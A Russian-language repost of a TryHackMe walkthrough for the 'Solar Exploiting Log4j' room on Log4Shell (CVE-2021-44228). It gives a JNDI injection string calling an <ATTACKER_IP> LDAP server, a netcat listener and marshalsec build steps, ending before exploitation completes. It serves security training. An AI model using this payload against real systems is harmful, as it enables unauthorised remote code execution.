Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!
solar-exploiting-log4j — Этот репозиторий предоставляет подробное пошаговое руководство по комнате *Solar Exploiting Log4j* на TryHackMe, сфокусированное на эксплуатации критической уязвимости Log4Shell (CVE-2021-44228). Проект демонстрирует, как злоумышленники могут использовать небезопасные механизмы логирования в Java-приложениях для достижения удаленного выполнения кода. | Kitploit
Этот репозиторий предоставляет подробное пошаговое руководство по комнате *Solar Exploiting Log4j* на TryHackMe, сфокусированное на эксплуатации критической уязвимости Log4Shell (CVE-2021-44228). Проект демонстрирует, как злоумышленники могут использовать небезопасные механизмы логирования в Java-приложениях для достижения удаленного выполнения кода.
Поделиться
🔥 Solar Exploiting Log4j - Пошаговое руководство TryHackMe
📌 Комната: Solar Exploiting Log4j
Платформа: TryHackMe
Сложность: Средняя
Тема: Log4Shell (уязвимость Log4j)
🧠 Цель
Эксплуатировать уязвимость Log4j (CVE-2021-44228) для получения удаленного выполнения кода и захвата флагов.
🛠️ Используемые инструменты
Nmap
Burp Suite
cURL
Netcat
Python HTTP Server
🌐 Шаг 1: Разведка
🔍 Сканирование цели
root@kitploit:~
nmap -sC -sV <TARGET_IP>
📌 Результаты
Открытые порты: 80 (HTTP), другие в зависимости от комнаты
Веб-приложение с бэкендом на Java
🌐 Шаг 2: Перебор веб-приложения
Посетить веб-приложение в браузере
Взаимодействовать с полями ввода (логин/поиск/заголовки)
Перехватить запрос с помощью Burp Suite
💥 Шаг 3: Обнаружение уязвимости Log4j
Уязвимость Log4j позволяет внедрение JNDI:
root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}
Если ввод логируется → уязвимость присутствует.
⚙️ Шаг 4: Настройка слушателя
Запуск Netcat
root@kitploit:~
nc -lvnp 4444
Запуск вредоносного LDAP-сервера (пример)
root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package